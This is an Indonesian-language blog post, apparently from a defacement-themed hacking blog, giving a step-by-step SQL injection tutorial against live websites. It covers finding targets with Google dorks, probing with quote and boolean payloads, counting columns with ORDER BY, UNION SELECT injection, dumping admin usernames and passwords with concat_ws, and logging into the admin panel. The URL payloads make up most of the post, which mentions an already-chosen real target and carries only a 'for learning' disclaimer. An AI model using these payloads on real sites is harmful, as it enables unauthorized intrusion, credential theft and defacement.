-->
Home
DEFACE

Deface POC SQL-Injection dengan DIOS

Friday, December 25, 2020


Hallo guys!
Kembali lagi dengan gw (Fadly) di blog sederhana gw 😆
Oke pada artikel kali ini gw mau share ke kalian tutorial melakukan serangan SQL Injection pada suatu website, Apa yang gw tulis disini semata-mata untuk pembelajaran bukan untuk hal yang tidak baik.

Oke langsung aja simak tutorialnya sampai paham, Gw bakal jelasin step by step nya 😂

1. Carilah parameter di website tersebut

Step pertama yang harus kalian lakukan adalah mencari parameter di website target, Untuk pembelajaran kalian bisa gunakan google dork, Bagi yang belum tau apa itu google dork kalian bisa baca disini : Click here!

Contoh parameter :
  • .php?id=
  • ?id=
  • DLL
Berhubung gw udah dapet targetnya, Maka langsung aja kita lanjut ke step berikutnya.

2. Check vuln/tidak

Setelah kalian mendapatkan parameter di website tersebut kalian langsung saja cek website tersebut vuln atau tidak dengan menambahkan :
  • '
  • "
  • or 1=1
  • and 1=1
  • and true
  • and false
Jika ada beberapa bagian website yang blank, error atau menampilkan teks "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1" Maka bisa gw pastikan itu site vuln 😁

Kalo udah tau websitenya vuln langsung aja kalian lakukan order by, Seperti ini:
  • http://site.co/project.php?id=1'+order+by+1--+- (Normal)
  • http://site.co/project.php?id=1'+order+by+2--+- (Normal)
  • http://site.co/project.php?id=1'+order+by+3--+- (Normal)
  • http://site.co/project.php?id=1'+order+by+4--+- (Normal)
  • http://site.co/project.php?id=1'+order+by+5--+- (Error)
Ternyata hanya tersedia 4 column di website tersebut 😁


Bisa dilihat gambar diatas errornya seperti apa 😃

3. Melakukan union select

Jika sudah menemukan berapa jumlah column yang tersedia di website tersebut, Maka langsung saja kalian lakukan union select.

Bagaimana caranya? Caranya sangat mudah, Cukup ganti saja "order+by+5" nya dengan union select, Seperti ini:
  • http://site.co/project.php?id=1'+union+select+1,2,3,4--+-
Seharusnya akan muncul angka togelnya (Anak anak biasanya bilang gitu 😂) seperti ini:


Nah kalo udah tau angka togelnya berapa kalian langsung aja lakukan step berikutnya.

4. Menambahkan DIOS

Jika sudah tau angka togelnya berapa kalian langsung aja tambahkan DIOS (Dump In One Shoot) nya di salah satu angka togel tersebut, Berikut ini beberapa DIOS yang gw sediain buat kalian 😍

  • http://site.co/project.php?id=1'+union+select+1,2,DIOSNYA,4--+-
Maka hasilnya kurang lebih akan seperti ini:



Jika sudah terlihat nama tabel dan column nya langsung aja kalian dump username dan passwordnya, Seperti ini:
  • http://site.co/project.php?id=1'+union+select+1,2,concat_ws(username,0x3a,password),4+from+user--+-
0x3a : Hex dari ":"
user : Tabel
username : Column yang tersedia di tabel user
password : Column yang tersedia di tabel user

Note : username, password dan user bisa kalian sesuaikan dengan nama table dan column yang ada di tabel tersebut.

5. Mencari halaman admin login dan login

Nah jika sudah mendapatkan username dan passwordnya kalian langsung aja cari halaman adminnya untuk login sebagai admin 😂
Kalo belum tau cara mencari halaman adminnya kalian bisa baca disini caranya : Click here!



Masukkan username dan login, Maka hasilnya akan seperti gambar diatas.


Kurang lebih seperti itu tutorialnya.
Ingat, tutorial ini hanya untuk pembelajaran, Semua yang dilakukan oleh pembaca itu tanggung jawab masing-masing.
Mohon maaf bila ada kesalahan kata dan sebagainya, Semoga bermanfaat.
Terima kasih 😊

Post a Comment